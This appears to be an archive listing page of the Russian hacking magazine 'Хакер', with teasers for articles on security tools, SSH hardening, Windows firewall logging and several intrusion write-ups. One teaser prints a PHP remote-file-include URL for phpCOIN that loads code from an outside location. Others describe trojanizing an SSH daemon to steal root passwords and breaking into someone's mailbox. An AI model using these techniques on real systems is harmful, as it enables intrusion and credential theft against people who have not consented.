Временная скидка 60% на годовую подписку!
Главная Статьи (страница 169)

Статьи

Cisco torch 0.4b

Cisco Torch – утилита для массового сканирования, обнаружения и эксплуатации Cisco маршрутизаторов от авторов "Hacking Exposed Cisco Networks".

Обфускация кода C №1

Об оформлении кода программ можно спорить бесконечно, одни пишут так, другие этак. Однако сегодня мы поговорим о том, как оформлять код неправильно, как намеренно сделать его менее читаемым. По научному это называется обфускацией, однако в данном случае это не обфускация в прямом понимании, а лишь действительно затруднение понимания

Chroot-им SSH

Это руководство повествует о том как установить и запустить OpenSSH с chroot-ограничением. При помощи такой настройки появляется возможность дать пользователю shell доступ без опасения, что он сможет порушить весь сервер. Таким образом "входящий" юзер будет заперт в своей домашней директории без возможности покинуть ее.

Получи от Windows Firewall больше!

Если вы хотите получить больше информации из вашего встроенного в Windows файрвола, то можно сделать так. Для логгирования дропнутых пакетов: netsh firewall set logging droppedpackets=enable Для логгирования соединений: netsh firewall set logging connections=enable Для получения конфигурации файрвола: netsh firewall show logging Для управления файлом лога: netsh set logging set logging maxfilesize=20480 netsh set logging %windir%\pfirewall.log  

Office 2003/XP Add-in: Remove Hidden Data 1.1

Плагин к программам из пакета Microsoft Office XP/2003, позволяющий удалять из документов Word, Excel и PowerPoint скрытые данные и сведения о процессе разработки документа - комментарии и т.

Генетическая безопасность: отчет меньшинства

Кто не помнит фабулу фильма "Отчет меньшинства", когда с подсказки мутантов-провидцев полиция арестовывает человека прежде чем он совершит преступление? Еще недавно это было всего лишь фантастическим сценарием, однако, видимо, он может сбыться гораздо раньше, чем всем нам казалось

Ксения Собчак: сетевой суккуб

Кто такая Ксюша Собчак – точно не знает никто. Может запросто оказаться, что она – действительно силиконовое щупальце Толи Собчака, протянутое из могилы. Если верить группе «Культурная революция», он умер без ножа и нунчак

Link: Эволюция амебы

Всем программистам известны те трудности, с которыми приходится сталкиваться при разработке различных программ. А каждый биолог уверен, что естественный отбор сложнее любых других процессов в этой Вселенной. Хотите посмотреть на интеграцию этих мнений? Скачайте себе программу «Амёбы: борьба видов», в которой изначально содержатся электронные амебы и которым предстоит развиться и передать свои электронные гены следующим поколениям..

Управляем 1С Предприятием через сеть

Огромное количество организаций использует систему 1С:Предприятие, но не каждый пользователь подозревает о возможном проникновении в его систему чужаков и получении данных из базы, а также частичном управлении функциями 1С удаленно

Link: VTE — учебные курсы CERT

Американский Центр реагирования на компьютерные угрозы, существующий при Университете Карнеги-Меллона в Питсбурге (Computer Emergency Responce Team), известен многим. И не только публикациями информации об уязвимостям в программных продуктах, но и широкой учебной и просветительской деятельностью в сфере компьютерной безопасности

Анонимность в сетях GSM

Покупая sim каpточку, пpедофоpмленную на частное лицо или оpганизацию, ты покупаешь себе только одну тpеть анонимности. =) Втоpая тpеть состоит в том, чтобы иметь pазный imei для pазговоpов, котоpые не должны с тобой идентифицироваться

*nix-бэкдоры в подробностях №2

Троянизация SSH для перехвата пароля Ну и, наконец, стандартный метод, связанный с протрояниванием SSH-демона, чтобы стырить рутовый пасс. Взламываем тачку и устанавливаем на нее снифер, который нюхает пассы по SSH - допустим, модифицирует /bin/ssh и все логирует ;)

Anti…worm 1.007.0142

Утилита для обнаружение и удаления разнообразных интернет-червей и backdoors - Mytob, Mydoom, Beagle, Netsky, Sasser, Blaster Zafi, Mabutu, Startpage и некоторрых других.

*nix-бэкдоры в подробностях

Вступление В этой статье я хотел бы рассказать о принципах работы с бэкдорами в *nix-like осях и, частично, об их написании. Сразу скажу - первая часть статьи рассчитана на новичков. Для начала разберемся, что такое бэкдор и с чем его едят

Взлом английского почтовика

Так повелось, что я никогда не брался за взлом мыл. Но тут поступило заманчивое предложение от одного знакомого, которому позарез нужен был доступ к одному мылу. Само мыло располагалось на небольшом почтовике *.co.uk. Знакомый пробовал брутить мыло, но результата это не принесло и он обратился ко мне

OpenOffice: пробовать стоит

Что-то последнее время потянуло меня на альтернативу признанным вещам ай-ти индустрии, вот и до программного обеспечения добрались. А представить сегодня я хочу вам OpenOffice.org – пакет прикладных программ для работы с текстовыми документами, электронными таблицами, изображениями, базами данных и презентациями, который выступает в пику многими облюбованному MS Office

Задачки для программеров

1. Даны 2 буфера фиксированной длины. В начале каждого лежат данные (строчки текст), дальне до конца нули. Поменять строчки местами и перевернуть их задом наперед так, чтобы в итоге нули опять находились в конце, а текст - в начале

Меняем стандарты!

Держи курс на систему Медузы! = в Бобруйск, жывотное!. Могу предложить говоруна = учи албанский. Это склисс, он ничей = боян. Отличается умом и сообразительностью = аффтар жжот!. Растительности нет, полезных ископаемых нет, воды нет, населена роботами = кг/ам

В джунглях жесткого диска: замена локального поиска №1

Я не псих. Нет! Абсолютно!!! Просто они меня заставили. Притащили к компьютеру, бросили в кресло и сказали, что если я не напечатаю эту статью они взорвут Останкинскую Телебашню, Эрмитаж и Новосибирское метро. Погибнут тысячи людей из-за прихоти компьютерных файлов и некого в этом винить кроме меня, я не уследил за ними, я не знал, как далеко они продвинулись.

Взлом хостинга bajahosting.com.mx: PHP инклудинг на практике

Эта статья будет интересна в первую очередь начинающим хакерам. В ней я попытаюсь объяснить как применять php инклудинг. Сидя вечером 20 декабря Интернете я прочитал о только что найденной уязвимости в форуме phpCOIN. Статья называлась "PHP-инклудинг в phpCOIN v.1.2.2" Вот как выглядит данная уязвимость: http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location] Затем я пошел на www.altavista.com, набил для поиска phpCOIN 1.2.2 и стал разгребать найденные ссылки

Военный робот на CLIPS: работа с экспертной системой №2

Привет, я продолжаю дальше свое повествование и подумал, что было бы неплохо описать в этой главе эвристическую классификацию. Помнишь я упоминал про систему порождающих правил и поиск решения в глубину и ширину? Правильно, что не помнишь, потому что не упоминал

www.koders.com

Специальный поисковик для кодеров - ищет в исходниках! На настоящий момент им проиндексировано около 260 миллионов строк кода, так что думаю искомое сочетание ты обязательно отыщешь.

www.frsirt.com

French Security Incident Response Team - французский багтрак, регулярно обновляемый набор уязвимостей, эксплоитов и предупреждений о вирусах.

BWMeter v.2.3.5

Утилита для подсчета трафика, передаваемого по локальной сети, и его графического отображения.

Взлом fibo-forex.ru: храните деньги в сберегательных кассах

Интернет, как известно, это и огромная свалка и золотое дно одновременно. Что правит миром? Что самое главное в жизни и, пожалуй, в интернете? Ответ – деньги. Хотя, Данила Бодров со мной не согласился бы. :) Чтобы добыть денег надо взломать систему, которая бы производила операции с валютой, и желательно без такой крутой защиты как у eBay

bhcrew.org

Однажды Хуккерс зашел на сайт веб мэйл ру, а тот вдруг перестал работать. Хуккерс сообразил - дело не чисто, а значит есть почва для 0-дей сплоита. Но Хуккерс был молод и неопытен, и не знал еще ни перла ни php, а что касается asp .net - его тогда и в проекте не было

Страница 169 из 293В начало...140150160167168169170171 180190200...

25 лет «Хакеру»!

Еженедельный дайджест

Спасибо за подписку! Мы будем присылать важные новости ИБ в еженедельном дайджесте
Ошибка при подписке Случилась ошибка при создании подписки на наш дайджест. Пожалуйста, попробуйте позднее
Важные события и скидка на подписку:
«ХАКЕР» ДОСТУПЕН ТОЛЬКО В ЭЛЕКТРОННОЙ ВЕРСИИ
Оформи подписку — получи:
  • доступ к платным материалам сайта
  • доступ ко всем номерам PDF
4000 р.
на год
920 р.
на месяц

«Хакер» в соцсетях

Материалы для подписчиков